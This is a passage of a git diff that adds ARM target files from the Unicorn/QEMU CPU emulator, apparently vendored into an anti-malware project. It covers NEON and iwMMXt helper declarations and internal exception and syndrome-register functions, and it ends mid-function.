+DEF_HELPER_FLAGS_3(neon_sqadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_sqadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_sqadd_u64, TCG_CALL_NO_RWG, i64, env, i64, i64) +DEF_HELPER_3(neon_qsub_u8, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_u16, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_u32, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qadd_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qadd_s64, i64, env, i64, i64) +DEF_HELPER_3(neon_qsub_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qsub_s64, i64, env, i64, i64) + +DEF_HELPER_2(neon_hadd_s8, i32, i32, i32) +DEF_HELPER_2(neon_hadd_u8, i32, i32, i32) +DEF_HELPER_2(neon_hadd_s16, i32, i32, i32) +DEF_HELPER_2(neon_hadd_u16, i32, i32, i32) +DEF_HELPER_2(neon_hadd_s32, s32, s32, s32) +DEF_HELPER_2(neon_hadd_u32, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_s8, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_u8, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_s16, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_u16, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_s32, s32, s32, s32) +DEF_HELPER_2(neon_rhadd_u32, i32, i32, i32) +DEF_HELPER_2(neon_hsub_s8, i32, i32, i32) +DEF_HELPER_2(neon_hsub_u8, i32, i32, i32) +DEF_HELPER_2(neon_hsub_s16, i32, i32, i32) +DEF_HELPER_2(neon_hsub_u16, i32, i32, i32) +DEF_HELPER_2(neon_hsub_s32, s32, s32, s32) +DEF_HELPER_2(neon_hsub_u32, i32, i32, i32) + +DEF_HELPER_2(neon_cgt_u8, i32, i32, i32) +DEF_HELPER_2(neon_cgt_s8, i32, i32, i32) +DEF_HELPER_2(neon_cgt_u16, i32, i32, i32) +DEF_HELPER_2(neon_cgt_s16, i32, i32, i32) +DEF_HELPER_2(neon_cgt_u32, i32, i32, i32) +DEF_HELPER_2(neon_cgt_s32, i32, i32, i32) +DEF_HELPER_2(neon_cge_u8, i32, i32, i32) +DEF_HELPER_2(neon_cge_s8, i32, i32, i32) +DEF_HELPER_2(neon_cge_u16, i32, i32, i32) +DEF_HELPER_2(neon_cge_s16, i32, i32, i32) +DEF_HELPER_2(neon_cge_u32, i32, i32, i32) +DEF_HELPER_2(neon_cge_s32, i32, i32, i32) + +DEF_HELPER_2(neon_min_u8, i32, i32, i32) +DEF_HELPER_2(neon_min_s8, i32, i32, i32) +DEF_HELPER_2(neon_min_u16, i32, i32, i32) +DEF_HELPER_2(neon_min_s16, i32, i32, i32) +DEF_HELPER_2(neon_min_u32, i32, i32, i32) +DEF_HELPER_2(neon_min_s32, i32, i32, i32) +DEF_HELPER_2(neon_max_u8, i32, i32, i32) +DEF_HELPER_2(neon_max_s8, i32, i32, i32) +DEF_HELPER_2(neon_max_u16, i32, i32, i32) +DEF_HELPER_2(neon_max_s16, i32, i32, i32) +DEF_HELPER_2(neon_max_u32, i32, i32, i32) +DEF_HELPER_2(neon_max_s32, i32, i32, i32) +DEF_HELPER_2(neon_pmin_u8, i32, i32, i32) +DEF_HELPER_2(neon_pmin_s8, i32, i32, i32) +DEF_HELPER_2(neon_pmin_u16, i32, i32, i32) +DEF_HELPER_2(neon_pmin_s16, i32, i32, i32) +DEF_HELPER_2(neon_pmax_u8, i32, i32, i32) +DEF_HELPER_2(neon_pmax_s8, i32, i32, i32) +DEF_HELPER_2(neon_pmax_u16, i32, i32, i32) +DEF_HELPER_2(neon_pmax_s16, i32, i32, i32) + +DEF_HELPER_2(neon_abd_u8, i32, i32, i32) +DEF_HELPER_2(neon_abd_s8, i32, i32, i32) +DEF_HELPER_2(neon_abd_u16, i32, i32, i32) +DEF_HELPER_2(neon_abd_s16, i32, i32, i32) +DEF_HELPER_2(neon_abd_u32, i32, i32, i32) +DEF_HELPER_2(neon_abd_s32, i32, i32, i32) + +DEF_HELPER_2(neon_shl_u8, i32, i32, i32) +DEF_HELPER_2(neon_shl_s8, i32, i32, i32) +DEF_HELPER_2(neon_shl_u16, i32, i32, i32) +DEF_HELPER_2(neon_shl_s16, i32, i32, i32) +DEF_HELPER_2(neon_shl_u32, i32, i32, i32) +DEF_HELPER_2(neon_shl_s32, i32, i32, i32) +DEF_HELPER_2(neon_shl_u64, i64, i64, i64) +DEF_HELPER_2(neon_shl_s64, i64, i64, i64) +DEF_HELPER_2(neon_rshl_u8, i32, i32, i32) +DEF_HELPER_2(neon_rshl_s8, i32, i32, i32) +DEF_HELPER_2(neon_rshl_u16, i32, i32, i32) +DEF_HELPER_2(neon_rshl_s16, i32, i32, i32) +DEF_HELPER_2(neon_rshl_u32, i32, i32, i32) +DEF_HELPER_2(neon_rshl_s32, i32, i32, i32) +DEF_HELPER_2(neon_rshl_u64, i64, i64, i64) +DEF_HELPER_2(neon_rshl_s64, i64, i64, i64) +DEF_HELPER_3(neon_qshl_u8, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_u16, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_u32, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qshl_s64, i64, env, i64, i64) +DEF_HELPER_3(neon_qshlu_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qshlu_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qshlu_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qshlu_s64, i64, env, i64, i64) +DEF_HELPER_3(neon_qrshl_u8, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_u16, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_u32, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qrshl_s64, i64, env, i64, i64) + +DEF_HELPER_2(neon_add_u8, i32, i32, i32) +DEF_HELPER_2(neon_add_u16, i32, i32, i32) +DEF_HELPER_2(neon_padd_u8, i32, i32, i32) +DEF_HELPER_2(neon_padd_u16, i32, i32, i32) +DEF_HELPER_2(neon_sub_u8, i32, i32, i32) +DEF_HELPER_2(neon_sub_u16, i32, i32, i32) +DEF_HELPER_2(neon_mul_u8, i32, i32, i32) +DEF_HELPER_2(neon_mul_u16, i32, i32, i32) +DEF_HELPER_2(neon_mul_p8, i32, i32, i32) +DEF_HELPER_2(neon_mull_p8, i64, i32, i32) + +DEF_HELPER_2(neon_tst_u8, i32, i32, i32) +DEF_HELPER_2(neon_tst_u16, i32, i32, i32) +DEF_HELPER_2(neon_tst_u32, i32, i32, i32) +DEF_HELPER_2(neon_ceq_u8, i32, i32, i32) +DEF_HELPER_2(neon_ceq_u16, i32, i32, i32) +DEF_HELPER_2(neon_ceq_u32, i32, i32, i32) + +DEF_HELPER_1(neon_abs_s8, i32, i32) +DEF_HELPER_1(neon_abs_s16, i32, i32) +DEF_HELPER_1(neon_clz_u8, i32, i32) +DEF_HELPER_1(neon_clz_u16, i32, i32) +DEF_HELPER_1(neon_cls_s8, i32, i32) +DEF_HELPER_1(neon_cls_s16, i32, i32) +DEF_HELPER_1(neon_cls_s32, i32, i32) +DEF_HELPER_1(neon_cnt_u8, i32, i32) +DEF_HELPER_FLAGS_1(neon_rbit_u8, TCG_CALL_NO_RWG_SE, i32, i32) + +DEF_HELPER_3(neon_qdmulh_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qrdmulh_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qdmulh_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qrdmulh_s32, i32, env, i32, i32) + +DEF_HELPER_1(neon_narrow_u8, i32, i64) +DEF_HELPER_1(neon_narrow_u16, i32, i64) +DEF_HELPER_2(neon_unarrow_sat8, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_u8, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_s8, i32, env, i64) +DEF_HELPER_2(neon_unarrow_sat16, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_u16, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_s16, i32, env, i64) +DEF_HELPER_2(neon_unarrow_sat32, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_u32, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_s32, i32, env, i64) +DEF_HELPER_1(neon_narrow_high_u8, i32, i64) +DEF_HELPER_1(neon_narrow_high_u16, i32, i64) +DEF_HELPER_1(neon_narrow_round_high_u8, i32, i64) +DEF_HELPER_1(neon_narrow_round_high_u16, i32, i64) +DEF_HELPER_1(neon_widen_u8, i64, i32) +DEF_HELPER_1(neon_widen_s8, i64, i32) +DEF_HELPER_1(neon_widen_u16, i64, i32) +DEF_HELPER_1(neon_widen_s16, i64, i32) + +DEF_HELPER_2(neon_addl_u16, i64, i64, i64) +DEF_HELPER_2(neon_addl_u32, i64, i64, i64) +DEF_HELPER_2(neon_paddl_u16, i64, i64, i64) +DEF_HELPER_2(neon_paddl_u32, i64, i64, i64) +DEF_HELPER_2(neon_subl_u16, i64, i64, i64) +DEF_HELPER_2(neon_subl_u32, i64, i64, i64) +DEF_HELPER_3(neon_addl_saturate_s32, i64, env, i64, i64) +DEF_HELPER_3(neon_addl_saturate_s64, i64, env, i64, i64) +DEF_HELPER_2(neon_abdl_u16, i64, i32, i32) +DEF_HELPER_2(neon_abdl_s16, i64, i32, i32) +DEF_HELPER_2(neon_abdl_u32, i64, i32, i32) +DEF_HELPER_2(neon_abdl_s32, i64, i32, i32) +DEF_HELPER_2(neon_abdl_u64, i64, i32, i32) +DEF_HELPER_2(neon_abdl_s64, i64, i32, i32) +DEF_HELPER_2(neon_mull_u8, i64, i32, i32) +DEF_HELPER_2(neon_mull_s8, i64, i32, i32) +DEF_HELPER_2(neon_mull_u16, i64, i32, i32) +DEF_HELPER_2(neon_mull_s16, i64, i32, i32) + +DEF_HELPER_1(neon_negl_u16, i64, i64) +DEF_HELPER_1(neon_negl_u32, i64, i64) + +DEF_HELPER_FLAGS_2(neon_qabs_s8, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qabs_s16, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qabs_s32, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qabs_s64, TCG_CALL_NO_RWG, i64, env, i64) +DEF_HELPER_FLAGS_2(neon_qneg_s8, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qneg_s16, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qneg_s32, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qneg_s64, TCG_CALL_NO_RWG, i64, env, i64) + +DEF_HELPER_3(neon_abd_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_ceq_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_cge_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_cgt_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_acge_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_acgt_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_acge_f64, i64, i64, i64, ptr) +DEF_HELPER_3(neon_acgt_f64, i64, i64, i64, ptr) + +/* iwmmxt_helper.c */ +DEF_HELPER_2(iwmmxt_maddsq, i64, i64, i64) +DEF_HELPER_2(iwmmxt_madduq, i64, i64, i64) +DEF_HELPER_2(iwmmxt_sadb, i64, i64, i64) +DEF_HELPER_2(iwmmxt_sadw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_mulslw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_mulshw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_mululw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_muluhw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_macsw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_macuw, i64, i64, i64) +DEF_HELPER_1(iwmmxt_setpsr_nz, i32, i64) + +#define DEF_IWMMXT_HELPER_SIZE_ENV(name) \ +DEF_HELPER_3(iwmmxt_##name##b, i64, env, i64, i64) \ +DEF_HELPER_3(iwmmxt_##name##w, i64, env, i64, i64) \ +DEF_HELPER_3(iwmmxt_##name##l, i64, env, i64, i64) \ + +DEF_IWMMXT_HELPER_SIZE_ENV(unpackl) +DEF_IWMMXT_HELPER_SIZE_ENV(unpackh) + +DEF_HELPER_2(iwmmxt_unpacklub, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackluw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklul, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhub, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhuw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhul, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklsb, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklsw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklsl, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhsb, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhsw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhsl, i64, env, i64) + +DEF_IWMMXT_HELPER_SIZE_ENV(cmpeq) +DEF_IWMMXT_HELPER_SIZE_ENV(cmpgtu) +DEF_IWMMXT_HELPER_SIZE_ENV(cmpgts) + +DEF_IWMMXT_HELPER_SIZE_ENV(mins) +DEF_IWMMXT_HELPER_SIZE_ENV(minu) +DEF_IWMMXT_HELPER_SIZE_ENV(maxs) +DEF_IWMMXT_HELPER_SIZE_ENV(maxu) + +DEF_IWMMXT_HELPER_SIZE_ENV(subn) +DEF_IWMMXT_HELPER_SIZE_ENV(addn) +DEF_IWMMXT_HELPER_SIZE_ENV(subu) +DEF_IWMMXT_HELPER_SIZE_ENV(addu) +DEF_IWMMXT_HELPER_SIZE_ENV(subs) +DEF_IWMMXT_HELPER_SIZE_ENV(adds) + +DEF_HELPER_3(iwmmxt_avgb0, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_avgb1, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_avgw0, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_avgw1, i64, env, i64, i64) + +DEF_HELPER_3(iwmmxt_align, i64, i64, i64, i32) +DEF_HELPER_4(iwmmxt_insr, i64, i64, i32, i32, i32) + +DEF_HELPER_1(iwmmxt_bcstb, i64, i32) +DEF_HELPER_1(iwmmxt_bcstw, i64, i32) +DEF_HELPER_1(iwmmxt_bcstl, i64, i32) + +DEF_HELPER_1(iwmmxt_addcb, i64, i64) +DEF_HELPER_1(iwmmxt_addcw, i64, i64) +DEF_HELPER_1(iwmmxt_addcl, i64, i64) + +DEF_HELPER_1(iwmmxt_msbb, i32, i64) +DEF_HELPER_1(iwmmxt_msbw, i32, i64) +DEF_HELPER_1(iwmmxt_msbl, i32, i64) + +DEF_HELPER_3(iwmmxt_srlw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_srll, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_srlq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sllw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_slll, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sllq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sraw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sral, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sraq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_rorw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_rorl, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_rorq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_shufh, i64, env, i64, i32) + +DEF_HELPER_3(iwmmxt_packuw, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packul, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packuq, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packsw, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packsl, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packsq, i64, env, i64, i64) + +DEF_HELPER_3(iwmmxt_muladdsl, i64, i64, i32, i32) +DEF_HELPER_3(iwmmxt_muladdsw, i64, i64, i32, i32) +DEF_HELPER_3(iwmmxt_muladdswl, i64, i64, i32, i32) + +DEF_HELPER_3(neon_unzip8, void, env, i32, i32) +DEF_HELPER_3(neon_unzip16, void, env, i32, i32) +DEF_HELPER_3(neon_qunzip8, void, env, i32, i32) +DEF_HELPER_3(neon_qunzip16, void, env, i32, i32) +DEF_HELPER_3(neon_qunzip32, void, env, i32, i32) +DEF_HELPER_3(neon_zip8, void, env, i32, i32) +DEF_HELPER_3(neon_zip16, void, env, i32, i32) +DEF_HELPER_3(neon_qzip8, void, env, i32, i32) +DEF_HELPER_3(neon_qzip16, void, env, i32, i32) +DEF_HELPER_3(neon_qzip32, void, env, i32, i32) + +DEF_HELPER_4(crypto_aese, void, env, i32, i32, i32) +DEF_HELPER_4(crypto_aesmc, void, env, i32, i32, i32) + +DEF_HELPER_5(crypto_sha1_3reg, void, env, i32, i32, i32, i32) +DEF_HELPER_3(crypto_sha1h, void, env, i32, i32) +DEF_HELPER_3(crypto_sha1su1, void, env, i32, i32) + +DEF_HELPER_4(crypto_sha256h, void, env, i32, i32, i32) +DEF_HELPER_4(crypto_sha256h2, void, env, i32, i32, i32) +DEF_HELPER_3(crypto_sha256su0, void, env, i32, i32) +DEF_HELPER_4(crypto_sha256su1, void, env, i32, i32, i32) + +DEF_HELPER_FLAGS_3(crc32_arm, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) +DEF_HELPER_FLAGS_3(crc32c, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) +DEF_HELPER_2(dc_zva, void, env, i64) + +DEF_HELPER_FLAGS_2(neon_pmull_64_lo, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(neon_pmull_64_hi, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +#ifdef TARGET_ARM +#define helper_clz helper_clz_arm +#define gen_helper_clz gen_helper_clz_arm +#define helper_crc32 helper_crc32_arm +#define gen_helper_crc32 gen_helper_crc32_arm +#endif + +#ifdef TARGET_AARCH64 +#include "helper-a64.h" +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/internals.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/internals.h new file mode 100644 index 0000000..c1ad757 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/internals.h @@ -0,0 +1,383 @@ +/* + * QEMU ARM CPU -- internal functions and types + * + * Copyright (c) 2014 Linaro Ltd + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + * + * This header defines functions, types, etc which need to be shared + * between different source files within target-arm/ but which are + * private to it and not required by the rest of QEMU. + */ + +#ifndef TARGET_ARM_INTERNALS_H +#define TARGET_ARM_INTERNALS_H + +static inline bool excp_is_internal(int excp) +{ + /* Return true if this exception number represents a QEMU-internal + * exception that will not be passed to the guest. + */ + return excp == EXCP_INTERRUPT + || excp == EXCP_HLT + || excp == EXCP_DEBUG + || excp == EXCP_HALTED + || excp == EXCP_EXCEPTION_EXIT + || excp == EXCP_KERNEL_TRAP + || excp == EXCP_STREX; +} + +/* Exception names for debug logging; note that not all of these + * precisely correspond to architectural exceptions. + */ +static const char * const excnames[] = { + NULL, + "Undefined Instruction", + "SVC", + "Prefetch Abort", + "Data Abort", + "IRQ", + "FIQ", + "Breakpoint", + "QEMU v7M exception exit", + "QEMU intercept of kernel commpage", + "QEMU intercept of STREX", + "Hypervisor Call", + "Hypervisor Trap", + "Secure Monitor Call", + "Virtual IRQ", + "Virtual FIQ", +}; + +static inline void arm_log_exception(int idx) +{ + if (qemu_loglevel_mask(CPU_LOG_INT)) { + const char *exc = NULL; + + if (idx >= 0 && idx < ARRAY_SIZE(excnames)) { + exc = excnames[idx]; + } + if (!exc) { + exc = "unknown"; + } + qemu_log_mask(CPU_LOG_INT, "Taking exception %d [%s]\n", idx, exc); + } +} + +/* Scale factor for generic timers, ie number of ns per tick. + * This gives a 62.5MHz timer. + */ +#define GTIMER_SCALE 16 + +/* + * For AArch64, map a given EL to an index in the banked_spsr array. + */ +static inline unsigned int aarch64_banked_spsr_index(unsigned int el) +{ + static const unsigned int map[4] = { + 0, + 0, /* EL1. */ + 6, /* EL2. */ + 7, /* EL3. */ + }; + assert(el >= 1 && el <= 3); + return map[el]; +} + +int bank_number(int mode); +void switch_mode(CPUARMState *, int); +void arm_cpu_register_gdb_regs_for_features(ARMCPU *cpu); +void arm_translate_init(struct uc_struct *uc); + +enum arm_fprounding { + FPROUNDING_TIEEVEN, + FPROUNDING_POSINF, + FPROUNDING_NEGINF, + FPROUNDING_ZERO, + FPROUNDING_TIEAWAY, + FPROUNDING_ODD +}; + +int arm_rmode_to_sf(int rmode); + +static inline void aarch64_save_sp(CPUARMState *env, int el) +{ + if (env->pstate & PSTATE_SP) { + env->sp_el[el] = env->xregs[31]; + } else { + env->sp_el[0] = env->xregs[31]; + } +} + +static inline void aarch64_restore_sp(CPUARMState *env, int el) +{ + if (env->pstate & PSTATE_SP) { + env->xregs[31] = env->sp_el[el]; + } else { + env->xregs[31] = env->sp_el[0]; + } +} + +static inline void update_spsel(CPUARMState *env, uint32_t imm) +{ + unsigned int cur_el = arm_current_el(env); + /* Update PSTATE SPSel bit; this requires us to update the + * working stack pointer in xregs[31]. + */ + if (!((imm ^ env->pstate) & PSTATE_SP)) { + return; + } + aarch64_save_sp(env, cur_el); + env->pstate = deposit32(env->pstate, 0, 1, imm); + + /* We rely on illegal updates to SPsel from EL0 to get trapped + * at translation time. + */ + assert(cur_el >= 1 && cur_el <= 3); + aarch64_restore_sp(env, cur_el); +} + +/* Return true if extended addresses are enabled. + * This is always the case if our translation regime is 64 bit, + * but depends on TTBCR.EAE for 32 bit. + */ +static inline bool extended_addresses_enabled(CPUARMState *env) +{ + return arm_el_is_aa64(env, 1) + || ((arm_feature(env, ARM_FEATURE_LPAE) + && (env->cp15.c2_control & TTBCR_EAE))); +} + +/* Valid Syndrome Register EC field values */ +enum arm_exception_class { + EC_UNCATEGORIZED = 0x00, + EC_WFX_TRAP = 0x01, + EC_CP15RTTRAP = 0x03, + EC_CP15RRTTRAP = 0x04, + EC_CP14RTTRAP = 0x05, + EC_CP14DTTRAP = 0x06, + EC_ADVSIMDFPACCESSTRAP = 0x07, + EC_FPIDTRAP = 0x08, + EC_CP14RRTTRAP = 0x0c, + EC_ILLEGALSTATE = 0x0e, + EC_AA32_SVC = 0x11, + EC_AA32_HVC = 0x12, + EC_AA32_SMC = 0x13, + EC_AA64_SVC = 0x15, + EC_AA64_HVC = 0x16, + EC_AA64_SMC = 0x17, + EC_SYSTEMREGISTERTRAP = 0x18, + EC_INSNABORT = 0x20, + EC_INSNABORT_SAME_EL = 0x21, + EC_PCALIGNMENT = 0x22, + EC_DATAABORT = 0x24, + EC_DATAABORT_SAME_EL = 0x25, + EC_SPALIGNMENT = 0x26, + EC_AA32_FPTRAP = 0x28, + EC_AA64_FPTRAP = 0x2c, + EC_SERROR = 0x2f, + EC_BREAKPOINT = 0x30, + EC_BREAKPOINT_SAME_EL = 0x31, + EC_SOFTWARESTEP = 0x32, + EC_SOFTWARESTEP_SAME_EL = 0x33, + EC_WATCHPOINT = 0x34, + EC_WATCHPOINT_SAME_EL = 0x35, + EC_AA32_BKPT = 0x38, + EC_VECTORCATCH = 0x3a, + EC_AA64_BKPT = 0x3c, +}; + +#define ARM_EL_EC_SHIFT 26 +#define ARM_EL_IL_SHIFT 25 +#define ARM_EL_IL (1 << ARM_EL_IL_SHIFT) + +/* Utility functions for constructing various kinds of syndrome value. + * Note that in general we follow the AArch64 syndrome values; in a + * few cases the value in HSR for exceptions taken to AArch32 Hyp + * mode differs slightly, so if we ever implemented Hyp mode then the + * syndrome value would need some massaging on exception entry. + * (One example of this is that AArch64 defaults to IL bit set for + * exceptions which don't specifically indicate information about the + * trapping instruction, whereas AArch32 defaults to IL bit clear.) + */ +static inline uint32_t syn_uncategorized(void) +{ + return (EC_UNCATEGORIZED << ARM_EL_EC_SHIFT) | ARM_EL_IL; +} + +static inline uint32_t syn_aa64_svc(uint32_t imm16) +{ + return (EC_AA64_SVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa64_hvc(uint32_t imm16) +{ + return (EC_AA64_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa64_smc(uint32_t imm16) +{ + return (EC_AA64_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa32_svc(uint32_t imm16, bool is_thumb) +{ + return (EC_AA32_SVC << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) + | (is_thumb ? 0 : ARM_EL_IL); +} + +static inline uint32_t syn_aa32_hvc(uint32_t imm16) +{ + return (EC_AA32_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa32_smc(void) +{ + return (EC_AA32_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL; +} + +static inline uint32_t syn_aa64_bkpt(uint32_t imm16) +{ + return (((unsigned int)EC_AA64_BKPT) << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa32_bkpt(uint32_t imm16, bool is_thumb) +{ + return (((unsigned int)EC_AA32_BKPT) << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) + | (is_thumb ? 0 : ARM_EL_IL); +} + +static inline uint32_t syn_aa64_sysregtrap(int op0, int op1, int op2, + int crn, int crm, int rt, + int isread) +{ + return (EC_SYSTEMREGISTERTRAP << ARM_EL_EC_SHIFT) | ARM_EL_IL + | (op0 << 20) | (op2 << 17) | (op1 << 14) | (crn << 10) | (rt << 5) + | (crm << 1) | isread; +} + +static inline uint32_t syn_cp14_rt_trap(int cv, int cond, int opc1, int opc2, + int crn, int crm, int rt, int isread, + bool is_thumb) +{ + return (EC_CP14RTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) + | (crn << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_cp15_rt_trap(int cv, int cond, int opc1, int opc2, + int crn, int crm, int rt, int isread, + bool is_thumb) +{ + return (EC_CP15RTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc2 << 17) | (opc1 << 14) + | (crn << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_cp14_rrt_trap(int cv, int cond, int opc1, int crm, + int rt, int rt2, int isread, + bool is_thumb) +{ + return (EC_CP14RRTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc1 << 16) + | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_cp15_rrt_trap(int cv, int cond, int opc1, int crm, + int rt, int rt2, int isread, + bool is_thumb) +{ + return (EC_CP15RRTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20) | (opc1 << 16) + | (rt2 << 10) | (rt << 5) | (crm << 1) | isread; +} + +static inline uint32_t syn_fp_access_trap(int cv, int cond, bool is_thumb) +{ + return (EC_ADVSIMDFPACCESSTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 0 : ARM_EL_IL) + | (cv << 24) | (cond << 20); +} + +static inline uint32_t syn_insn_abort(int same_el, int ea, int s1ptw, int fsc) +{ + return (((unsigned int)EC_INSNABORT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (ea << 9) | (s1ptw << 7) | fsc; +} + +static inline uint32_t syn_data_abort(int same_el, int ea, int cm, int s1ptw, + int wnr, int fsc) +{ + return (((unsigned int) EC_DATAABORT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (ea << 9) | (cm << 8) | (s1ptw << 7) | (wnr << 6) 